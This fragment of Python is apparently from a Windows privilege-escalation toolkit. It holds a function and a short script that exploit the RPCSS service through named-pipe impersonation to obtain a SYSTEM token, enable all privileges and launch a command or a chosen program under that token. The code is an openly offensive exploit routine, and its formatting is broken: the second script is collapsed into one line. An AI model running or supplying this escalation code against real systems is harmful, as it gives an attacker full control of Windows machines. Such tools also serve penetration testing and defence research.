def rpcss(args):
printT("Trying to exploit 'RPCSS'...")
printT("It can take many seconds, so wait...")
esc = Escalation()
status = esc.namedPipeImpersonationSystemViaRPCSS()
if status == True:
imp = Impersonate()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to exploit 'RPCSS'")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate import subprocess import time esc = Escalation() esc.namedPipeImpersonationSystemViaRPCSS() imp = Impersonate() imp.enableAllUserRights() #required, othwerwise not enough privileges imp.executeWithThreadEffectiveToken(appName=sys.argv[1])